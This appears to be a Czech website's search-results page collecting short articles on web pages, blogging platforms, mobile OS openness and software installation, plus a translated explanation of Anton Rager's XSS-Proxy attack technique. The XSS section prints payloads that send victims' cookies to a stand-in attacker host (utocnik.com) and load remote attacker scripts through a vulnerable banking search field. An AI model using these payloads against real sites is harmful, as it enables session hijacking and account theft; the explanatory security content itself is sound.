Výsledky vyhledávání v sekci Webové stránky na dotaz srovnani windows

Co je webová stránka

access_time13.květen 2019personRedakce

Webová stránka je základním prvkem webu. World Wide Web je označení pro aplikace internetového protokolu HTTP, které jsou navzájem propojeny pomocí hypertextových dokumentů.V dnešní době je web využíván jako plnohodnotný kanál pro sdílení informací – od informačních stránek, přes zpravodajské portály, vyhledávače, emailové služby, eshopy, komerční prezentace až po sociální sítě a složité aplikace.Díky masovému rozšíření webu je dnes nedílnou součástí internetových stránek také reklama. Reklama na internetu existuje v několika formách – reklama ve vyhledávačích, textová reklama a bannerová reklama (tzv. display)K prohlížení webu je zapotřebí webový prohlížeč. Moderní operační systémy mají zpravidla integrovaný webový prohlížeč přímo v základní instalaci. Pro Windows je to Internet Explorer, Pro Mac OS je to Safari. Na vzestupu jsou stále také alternativní prohlížeče, mezi nejvštší patří Opera, Chrome a Firefox.S příchodem chytrých telefonů se značně rozšířilo rovněž využívání mobilního webu. Zde jednoznačně dominuje prohlížeč Safari, který je základním prohlížečem iPhone.

folder_openPřiřazené štítky

Jakou zvolit platformu pro váš blog

access_time13.květen 2019personJana

Rozhodli jste se, že si založíte blog? Gratuluji! Možná ale počáteční nadšení vystřídala lehká panika. Jak to vlastně technicky zajistit? Jak a kde si blog vytvořím? Osobně doporučuji blog postavit na některém populárním redakčním systému. Nejčastěji se jedná o WordPress a Blogger. Založení a správa blogu na těchto systémech je velice jednoduchá a  intuitivní. Oba jsou zdarma, každý má svá specifika, výhody a nevýhody. Pojďme se na ně podívat blíže.WordPressPravděpodobně nejpopulárnější platforma pro blogování na světě. Údajně běží na WordPressu 15% všech světových webových stránek.  Na výběr máte dvě možnosti:1) pokud nemáte vlastní doménu a prostor (webhosting), využijte WordPress.com, kde si vytvoříte blog, který bude mít název typu „mujblog.wordpress.com“. Stránka je uložena na serverech WordPressu a vy nemusíte nic řešit, pouze začít blogovat. Je ale v angličtině.2) pokud chcete vlastní doménu („www.mujblog.cz“), můžete si na tuto doménu WordPress nainstalovat a používat ho stejně, jako v prvním bodě. Navíc máte možnost zvolit z tisíců volně dostupných témat, neboli vzhledu stránek (případně koupit nějaký placený), instalovat různé doplňky (pluginy) atd. Informace a postupy najdete například na českých stránkách o WordPressu. WordPress jako takový je plně v češtině, takže mu budete rozumnět :-).Z varianty 1 můžete v případě potřeby bez problémů i s rozběhnutým blogem přejít na variantu 2.BloggerToto je platforma poskytovaná společností Google. Pokud máte jakýkoli produkt od Google (Google+, e-mail atd.), pod stejným účtem si můžete založit také blog na Bloggeru. Pokud ne, účet si založíte nový. Práce se systémem je opět velmi jednoduchá. Trochu obtížnější je, pokud chcete změnit vzhled svého blogu nad rámec témat poskytovaných Bloggerem, či potřebujete nějaké další vychytávky. Pak už potřebujete znát něco z HTML kódování. Na druhou stranu má ale Blogger jednu velkou výhodu. Protože patří do rodiny Google, vyhledávací roboti Google mají Blogger velmi rádi a tak můžete velmi snadno se svým blogem získat přední místa ve vyhledávači, aniž byste museli nějak zásadně řešit SEO optimalizaci (tj. optimalizaci textů a klíčových slov právě pro vyhledávače). Stačí kvalitní nadpisy článků obsahující slova a slovní spojení, která pravděpodobně budou lidé ve vyhledávači zadávat. Blog zde zakládáte se jmém typu „mujblog.blogspot.com“  s tím, že v budoucnu ho můžete kdykoli převést na svou vlastní doménu typu „mujblog.cz“. Na Bloggeru také funguje zajímavým způsobem komunita a možnost sledování oblíbených blogů, kdy například vidíte, kolik má který blog sledovatelů, což jistě stojí také za zvážení.SocialWebJedná se o něco mezi WordPress a Blogger, kdy je možné jako v bloggeru jednoduše sestavit celý web online a jako ve WordPressu si můžete stáhnout skutečný zdrojový kód, který můžete nahrát na jakýkoliv váš webhosting.To však neznamená, že budete mít administraci pro každý váš web na každé doméně jako u WordPressu, správa všech webů probíhá přímo přes aplikaci SocialWeb.SocialWeb kromě toho, že blogy a magazíny umí vytvářet - je také komunita, to znamená, že si můžete vydělávat třeba tím, že budete psát články i do blogů jiných členů SocialWebu, můžete s ostatními členy komunikovat atd.No a to hlavní, co u ostatních nenajdete je fakt, že SocialWeb, pokud to povolíte se automaticky snaží váš web monetizovat a to různými způsoby, například publikací placených tématických PR článků přes aplikaci PRstudio.cz a nebo publikováním reklam a nebo video reklam na vašich webech, ze kterých pak získáváte provize (asi 70% z ceny, kterou někdo za marketing na vámi vytvořeném webu zaplatí).SocialWeb je však vhodný spíše pro ty, kteří to s blogováním a vyděláváním na internetu myslí opravdu vážně hlavně proto, že můžete spravovat v jednom účtu třeba sto blogu (magazínů), můžete si sestavovat vlastní týmy autorů, které můžete outsourcovat i jiným členům a tak dále.Abych to dokončila, tak jediné co se v SocialWebu platí je členský příspěvek, což je 250 Kč/měsíc, ale za to máte přístup ke všm funkcím, všem šablonám, všem datům a můžete vytvořit a spravovat jak jsem řekla třeba 100 webových stránek včetně všech 100 webhostingů a třeba 1000 emailových schránek zdarma. A ten členský příspěvek tedy lehce uhradíte z toho co vám SocialWeb každý měsíc vydělá.Dobře si promyslete, jakému účelu má váš nově zakládaný blog sloužit, jak má vypadat, jak se chovají potencionální čtenáři a jaké blogy již nyní sledují, a také jak plánujete s blogem nakládat do budoucna. Pokud plánujete blog používat i pro podnikání a třeba vytvořit členskou sekci, jakýkoli placený produkt apod., lze spíše doporučit WordPress, který je flexibilnější co se týče vzhledu stránek i různých dodatečných vylepšení a doplňků (pluginů). Pokud ale chcete vytvářet a spravovat více jak jeden blog, ze kterého chcete mít i příjem pak je vhodné zvážit SocialWeb.cz, na kterém jede třeba i tento web WebŽivě.cz a nabízí funkce, které ani WordPress nenabízí.Pokud plánujete blog spíše formou koníčku a nechcete se v budoucnu nořit do složitějších projektů, můžete vyzkoušet Blogger. Také o něm uvažujte, pokud na stejném systému běží spřátelené či naopak konkurenční blogy a vyskytují se tam vaši potencionální čtenáři.Existuje samozřejmě spousta dalších blogovacích systémů, například Joomla, Drupal nebo Tumblr (ten zvažte, pokud plánujete zveřejňovat hlavně obrázky či videa a minimum textu)V českých vodách můžete narazit například na Blog.cz – ten ale opravdu nedoporučuji. Blogy na tomto systému vytvořené jsou většinou nevzhledné a je velmi těžké vzhled nějak přizpůsobit k obrazu svému.

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci Operační systémy a Aplikace na dotaz srovnani windows

Android? iOS? Zamčený nebo odemčený OS? Souběžně!

access_time13.květen 2019personRedakce

Občas se v diskuzích objevují zajímavé hádky. Ty máš Android! Tvůj operační systém je otevřený, můžeš instalovat cokoliv. Počkej si na malware! Fuj, iOS! Vždyť to ani není operační systém a všechno musí jít přes AppStore. Jako na dětském pískovišti.Jednou se mne známý ptal jak jako “ten velký liberál” můžu propagovat jakýsi uzavřený operační systém kde o  tom jaké aplikace půjdou nebo nepůjdou spustit rozhoduje jakási autorita z Apple. A o to právě jde. Pokud budeme někomu nutit jakousi “svobodu”, tak se o žádnou svobodu nejedná. Pokud třeba výrobcům zákonem nařídíme vyrábět pouze operační systémy které budou zpracovávat jakýsi otevřený standard, již se jedná o protlačování “svobody” ( svobody výrobce byly právě omezeny ) které svobodné není.Jaké je tedy správné řešení? Pokud se lidem nelíbí uzavřenost operačního systému, dříve nebo později vznikne operační systém který tyto otevřené standardy implementuje dobrovolně. Bude jak plně otevřený tak jeho aplikace nepoběží v sandboxu ale bude moci dělat v systému cokoli.Považujete toto ale skutečně za výhodu? Já si naopak jako iOS developer myslím, že je dobře žekaždá aplikace si v systému již nemůže dělat co chce. Nemusím se tak bát toho, že mi nějaký malware bude vytáčet drahá telefonní čísla, posílat SMS zprávy do zahraničí nebo krást data ( i když tohle už se dá v sandboxu někdy udělat ). Jsem rád, že jsou již pryč doby Symbianu, kde si jisté aplikace samy prodlužovaly licenci tím že každý měsíc poslaly SMS zprávu na premium telefonní číslo. Tyto techniky už dneska nejdou.Otevřený nebo uzavřený operační systém? I na desktopu se časem dočkáme toho, že budeme aplikace nechávat podepisovat a sandboxovat. Jako uživatel bych zvolil operační systém tohoto typu, jako vývojář si pak můžu užívat operačního systému kde mohu skoro všechno. Například Linuxu. Nehádejte se a nechte ty platformy existovat vedle sebe.

folder_openPřiřazené štítky

Instalace jako přežitek počítačů

access_time13.květen 2019personRedakce

Každý známe nějakou instalaci počítačového programu. Nemám na mysli jakékoli zpřístupnění souboru v systému, kdy se ukazuje že se program instaluje, ale instalační proces, kdy jsou rozmísťovány soubory po celém systému. Například na Windows. Uživatel si stáhne instalátor, většinou buďto jako MSI balíček nebo jako samostatný program, který poté otevře. Tento program zapíše do registrů příslušné klíče se záznamy pro budoucí odinstalování programu včetně případných autorunů, asociací přípon pro otevírání v tomto programu a spoustu dalšího. Poté se rozkopíruje do programové složky ( těš se na ten bordel pokud nezvolíš Program Files ) a případně ještě vytvoří své zástupce ve Startu a na ploše. Skvělé. Není zde žádné jednotné interface, vývojáři si své instalátory píší sami.Stejně tak to má i Linux. Zde je více balíčkových systémů, každý ale také svoje data roztahá po systému. Už zde ale je složka /opt , kde mohou být data jedné aplikace pěkně pohromadě. Toto naplňuje přesně možnost číslo jedna, o které se chystám nyní psát.Nejlépe to dělá Apple ve svém systému Mac OS X. Instalaci ze systému úplně vyřadil. Celou aplikaci ( program se zdroji jako obrázky nebo zvuky a další soubory ) jsou zkomprimovány do jednoho balíčku. Po stažení uživatel přesune celý baliček do složky Applications ( většinou je vše v jednom balíčku který po otevření zobrazí ikonu samotného programu a ikonu Applications, takže uživatel jen samotný program jednoduše přetáhne na Applications ) a tím je v podstatě nainstalovaný. Po spuštění odkudkoli program přistupuje do standardizované složky s konfiguračními soubory, kde si ukládá veškeré nastavení a další hodnoty, které si chce pamatovat. Samotný program pak může být samozřejmě při spuštění zakliknutý že se má spouštět při startu, samotný balíček s aplikací pak také můžete kamkoli přesunout.

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci Hacking na dotaz srovnani windows

Pokročilé techniky xss (cross-site scripting)

access_time16.červen 2020personRedakce

Popis pokročilého Cross-Site-Scriptingu, se vzdálenou kontrolou v reálném čase, od autora aplikace XSS-proxy jménem Anton Rager. Cross Site Scripting (XSS) je mnoha vývojáři a security profesionály obvykle považován za málo závažnou bezpečnostní zranitelnost. Do dnešní doby vznikla řada projektů s poukazem na potencionální rizika XSS, ale problém je převažne na pokraji zájmu bezpečnostních expertů a to včetně širších souvislostí o které tady jde.Autor aplikace XSS proxy napsal a zveřejnil popis v naději, že se odlehčený pohled na věc změní. Cituji: Doufám, že tímto dokumentem a vydáním nástroje pod jménem XSS-proxy (popsáno níže) změním pohled na celou situaci. XSS-Proxy umožňuje plnou kontrolu XSS útoků vzdáleným uživatelem (útočníkem). Tento dokument popisuje obvyklé XSS útoky a představuje nové metody/nástroje pro vytváření interaktivních XSS útoků, obojsměrných útoků a ještě více zla.Nejedná se o detailní návod (XSS howto), ale o širší vysvětlení metod XSS útoků. CGISecurity XSS FAQ (1) je dobrý zdroj pro celkový pohled na problematiku hlavních XSS zranitelností. V závěru textu jsou reference (2,3,4,5) obsahujíci skvělý materiál pro navazujíci XSS témata.Projekt XSS-proxy nevznikl jako platforma pro diskuzi a řešení. Existuje celá řada zdrojů, metod a možností pro hlášení chyb nebo opravování XSS děr. Pokročilé metody XSS které budou v textu představeny obcházejí mnoho metod aplikovaných proti XSS zranitelnostem. Doporučené čtení o hidden form inputs, URL re-writing, POST methods častokrát podsouvají řešení které nejsou 100% učinné, obzvlásť v případě, že má útočník přístup ke stejnému obsahu (a jscript/values) jako jeho oběť. Zbavit se všech speciálních HTML znaků nebo precizní filtrování vstupu je k ničemu v případě, že existuje neobjevený způsob jak vstup obelstít. Řešením může být rozdelení webových stránek na četné dokumentové domény, kde bude pro útočníka mnohem obtížnější provést/najít XSS útok/zranitelnost v porovnání s jediným místem kde je vše pohromadě. CGI vyhledávání na stránce v jedné subdoméně a citlivé oblasti na další(ch) může být užitečné.Pozadí XSSJako mnoho z vás ví, běžné XSS útoky vycházejí typicky ze dvou základních principů:1 – Útočník uploaduje <script> tag do veřejného fóra, blogu nebo stránek které navštevují uživatelé a obsahují XSS zranitelnost. Útočník pak díky přístupu získa (harvesting cookies) cookies webové stránky ze kterých vyčte řadu důležitých informací a díky tomu častokrát i přítpup k uživatelským účtum. Útoky jsou ale někdy využitelné mnohem hlouběji. Zde je to co myslím a říkam mnoha lidem co XSS přesně znamená. Příklad:Někdo chce odeslat následujíci kód na utocnik.com aby to další uživatelé sprocesovali.<script>document.write(„<img src=http://utocnik.com/“ + document.cookie + „>“)</script>Je to pokus o získání obrázku ze serveru útočníka pomocí cookies uživatele blogu priklad.com v URL.2 – Útočník použije veřejný web náchylný na útok XSS jak bylo uvedeno nahoře, nebo email zprávu založenu na XSS pro přesměrování uživatele na druhý server zranitelný pomocí XSS. Druhý server je aktuální cíl útočníka a stránka samozřejme obsahuje vlastní XSS zranitelnost, kde nic netušíci uživatel injektuje obsah <script> do dokumentu, který navenek pouze vidí. To v kombinaci s přesměrováním z dalšího webu umožňuje podvržení cookies, podvržení form/submit obsahu nebo specifickou akci XSSnutého uživatele proti dalšímu webu. Tato metoda je hodně rozšířena ale pramálo admiínistrátorů chápe, že se jedná o způsob útoku. Jak to funguje?Někdo chce odeslat následujíci kód na priklad.com aby to další uživatelé sprocesovali. <script>document.location=’http://ebanking.com/search?name=<script>document.write(„<img src=http://utocnik.com/“ + document.cookie + „>“)</script>'</script>Moment kdy je uživatel přesměrován na ebanking.com s hořejší XSS, toto je to co se vrátí uživateli a bude spuštěno:<script>document.write(„<img src=http://utocnik.com/“ + document.cookie + „>“)</script>To je pokus o získání obrázku ze serveru útočníka s cookies uživatele ebanking.com v URL.V minulosti hodně lidí zdůrazňovalo, že pokročilou manipulaci s webovým obsahem lze dosáhnout s XSS skriptem otevirajícím IFRAME (nebo další windows-like element) a loads/submits pro další dokumenty na stejné stránce. Důvěra v DOM umožňuje přítomnost Javascriptu v dokumentech a dovoluje interakci s dalšími windows/IFRAME, do doby než budou okna směrována do stejné dokumentové domény (protokol + domain_name + port).Aktuální metody XSS útoků jsou typicky limitovány pro jednu transakci a ve výsledku pouze v rámci cílové stránky, cookie harvesting nebo podvržení formuláře (form submission leakage). Zásady XSS-Proxy / ÚtokuXSS-Proxy rozšířuje běžné XSS útoky a kombinuje je s možností vykonání dalších Javascript příkazů, z libovolného vzdáleného serveru (viz Javascript Remoting reference číslo (6) pro detaily s IFRAME) pro možnost XSS být více než-li přesměrování s únikem cookies. Tato kombinace útočnikovi umožňuje ustavit stabilní, obousměrný kontrolní/přenosový kanál na oběť XSS a tím přistupovat na XSSnuté webové stránky s identitou oběti. Po celou dobu co má oběť útočníka otevřené XSS okno má útočník totální kontrolu nad prohlížečem oběti oproti XSS stránce s možností přesměrování na další stránky zranitelné XSS, nebo předání specifického blind requestu dalším serverům (viz reference číslo (3) provádění Cross-Site-Request-Forgeries aka CSRF a reference číslo (4) pro Session-Riding).Zmíněné situace lze dosáhnou s jedním nebo druhým útokem popsaným nahoře, teď se pokusíme názorně popsat příklad dvojího XSS přesměrování serveru. Oběť dostane XSS vektor pomocí blogu, diskuzního boardu, emailem atp. (předpokládaejme, že oběť surfuje na webech kde je možné vytvořit XSS – zavoláme stránku spatnyblog.com) a Javascript obsah přesměruje uživatele na druhou stránku (zavoláme druhou stránku ebanking.com a předpokládame samozřejmě, že stránka obsahuje XSS vo vyhledávací funkci, takže můžeme opakovat pomocí GET). Přesměrovací URL referuje na refers to a napadnutelnou část (cgi/etc) na druhém serveru což způsobý odezvu serveru která bude obsahovat Javascript příkaz útočníka který oběť vykoná.Inicializační XSS vektor na spatnyblog.com bude vypadat nějak takhle:<script>document.location=“http://ebanking.com/search?name=<script src=’http://utocnik.com/xss.js‘></script>“</script>Okno oběti teď má dokumentovou doménu ebanking.com a Javascript příkazy běží na doméně. Díky Javascript oběť posílá requesty na http://utocnik.com pro další skriptové příkazy. Nástroj XSS-Proxy aktuálně běží na utocnik.com a posyktuje další Javascripty pro inicializaci klientské části obsahujíci třeba funkce pro čtení dokumentů, procesování, přesměrování odpovědí, manipulaci chyb (error handling), stejně jako další příkazy pro vytvoření IFRAME, načtení root dokumentu (/) na cílovém serveru (ebanking.com) do IFRAME, načtení trvá pár vteřin, čtení obsahu (za použití innerHTML), pak následují další požadavek skriptů na http://utocnik.com. To vypadá komplexně ale jedná se pouze o několik řešení a reference časovač pro více volání skriptu na XSS-Proxy server. Funkce zůstanou v paměti až do doby než se okno oběti změní. Co se stane když od oběťi odejdou na http://utocnik.com subsekvenční skript requesty? Aktuálně se stanou dvě věci:1 – Obsah dokumentu v IFRAME (výsledky innerHTML pro daný objekt) jsou podvrženy do URL v skript requestu. Requesty skriptu jsou pouze GET, takže všechny volání skriptu obětí jsou jako volání normálniho dokumentu a ukládají parm/info na URL za jméno skriptu/stránky. Toto volání skriptu způsobý na serveru útočníka něco jako:GET /xss.js?data=Encoded_innerHTML_Contents HTTP/1.1Je to o něco víc komplexnější než to, že IE limituje délku URL (na přibližně 2049 znaků), takže většina dokumentů bude potřebovat naporcovat na části, které se na skritp URL request budou schopny dát dohromady. Aktuální nástroje se s tímto snaží vypořádat tak, že umísťují do URL dotazů přídavné informace pro znovusestavení (podobně jak to funguje u TCP/IP paketů).2 – Server na http://utocnik.com odpoví na poslední požadavek skriptu s více skirpt příkazy pro zachování trvání. Server buďto odpoví pomocía.) loop requestu (obyčejně řekne oběti počkej pár vteřin, pak znovu zkontroluj zda-li existují další příkazy skriptu)b.) dokument requestu (vlož dokument do IFRAME, přečti ho a přepošli výsledky pokud tě o to skript požádá)c.) submit requestu (nastav hodnoty vstupu ve formuláři s IFRAME, odešli, čekej na odpověď, přečti odpověď přepošli výsldek zpátky pokud o to skript požádá).Nebo pomocí javascript var/funkce požadavek na vyhodonocení (vyhodnoť výraz uvnitř aktuálniho okna v prohlížeči oběti a vrať výsledek+get příkazy). Proces pokračuje tak dloho jak oběť setrváva na stejné stránce.Zde je ASCII vizualizace okna a vysvětlení v souvislostech s cílem útočníka, po tom co je oběť přesměrována na finálni cíl a inicializován únos session:Existuje řada metod pro zamaskování aktuálniho „rezidentního“ okna pro útok (attack window) nebo IFRAME zaváděče. Celé okno lze schovat, stejně tak zrušit původní obsah stránek nebo proste použít skrytý IFRAME. Nástroj XSS-Proxy o kterém mluvíme, necháva okno včetně IFRAME pro oběť viditelné, ale modifikace je triviální (třeba interaktivně s Javascript Eval from). Existují i metody jak donutiti uživatele otevřít nové okno a obejít blokování pop-up oken. Jak? XSS proces přepíše odkazy v originálním dokumentu a otevření okne je pak pouze otázkou kliku. Nové oknomůže být kopii (zrcadlem) toho co si uživatel právě prohlíží, nebo výsledek odkliknutého odkazu ve veřejném XSS dokumentu a zmanipuluje oběť tak, že okno kontrolované XSS nechá běžet když dál surfuje.

folder_openPřiřazené štítky